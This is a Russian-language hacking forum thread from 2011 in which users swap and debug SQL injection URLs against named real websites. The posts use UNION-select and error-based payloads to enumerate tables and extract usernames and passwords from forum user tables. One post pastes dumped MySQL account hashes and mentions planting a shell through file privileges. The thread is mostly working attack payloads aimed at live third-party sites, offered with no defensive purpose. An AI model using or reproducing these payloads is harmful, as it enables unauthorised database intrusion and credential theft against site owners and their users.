16.05.2011, 06:59
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Как можно раскрутить это? А то не пойму, что не так с синтаксисом. Коммент ток на одну строку что ли попадает?
http://www.fc-anji.ru/search/?search=123')))+AS+foo--+
|
|
|
16.05.2011, 18:20
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
вот есть скуль:
Сообщение от None
http://www.gov.ai/story.php?id=254+OR+(SELECT+COUNT(*)+FROM+(SELECT+ 1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT( MID(concat_ws(0x3a,VERSION(),user(),database()),1, 63),+FLOOR(RAND(0)*2)))
а вот как дальше раскрутить до отоброжение таблиц?, чето не получается... |
|
|
|
16.05.2011, 18:46
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от winstrool
вот есть скуль:
а вот как дальше раскрутить до отоброжение таблиц?, чето не получается...
Там 4ая версия. А в 4ой версии нету information_schema. И еще про это написано в статьях.
|
|
|
|
16.05.2011, 19:44
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от winstrool
вот есть скуль:
а вот как дальше раскрутить до отоброжение таблиц?, чето не получается...
Все уже раскручено до тебя
http://goo.gl/bxvPO
|
|
|
|
17.05.2011, 00:03
|
|
Новичок
Регистрация: 04.12.2010
Сообщений: 7
С нами:
8125526
Репутация:
0
|
|
Часто встречаю в теме sql-инъекций сообщения вида:
Сообщение от None
Данные по полям User,Password,File_priv из таблицы mysql.user:
-------
root:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y
root:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y
Dunkan:*6FD087AFBFB4C2995C3C0AD9D2D5FB582CDDBF46:Y
lovas:*47B11BE6589C2FDE355C316D9DB18DB0C06CC536:Y
admin:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y
Не тыкнете носом какие статьи прочитать, чтобы знать как это можно использовать?(Про залив шелла через скулю с файл-привом = Y знаю.)
Спасибо. |
|
|
|
17.05.2011, 00:32
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Что не так??
Сообщение от None
http://www.ecom-info.spb.ru/news/index.php?id=1233+and+1=0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,group_concat%28concat_ws%280x3a 3a3a,user_name,pass%29+separator+0x0b%29,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35+from+forum_users+limit+0,20--
|
|
|
|
17.05.2011, 00:42
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
И почему в 4 версии не поддерживается table_schema?!
Как можно ещё?
table_schema
http://www.laitkipers.ru/news.php?id=40+and+1=0+union+select+1,group_concat %28table_name+separator+0x3a%29,3,4,5,6+from+infor mation_schema.tables+where+table_schema=0x636F6E63 6F7264345F6C6169746B6970657273--
|
|
|
|
17.05.2011, 01:06
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Osstudio
И почему в 4 версии не поддерживается table_schema?!
Как можно ещё?
table_schema
http://www.laitkipers.ru/news.php?id=40+and+1=0+union+select+1,group_concat %28table_name+separator+0x3a%29,3,4,5,6+from+infor mation_schema.tables+where+table_schema=0x636F6E63 6F7264345F6C6169746B6970657273--
|
|
|
|
17.05.2011, 01:15
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от Osstudio
Что не так??
Код:
http://www.ecom-info.spb.ru/news/index.php?id=1233+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x3a,count(*)),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+forum_users+--+
пустая таблица
|
|
|
|
17.05.2011, 02:39
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Osstudio
Что не так??
во первых синтаксетическая ошибка:
group_concat(concat_ws( 0x3a3a3a,user_name,pass)+separator+0x0b)
а должно быть:
group_concat(concat_ws( 0x3a,user_name,pass)+separator+0x0b)
во вторых, там таблица пустая!!!
а вообще для примера по твоей уязвимости вот пример вывода:
Сообщение от None
http://www.ecom-info.spb.ru/news/index.php?id=1233+and+1=0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,group_concat%28concat_ws(0x3a,r eg_ip)+separator+0x0b%29,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35+from+subscri be_emails+limit+0,20--
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
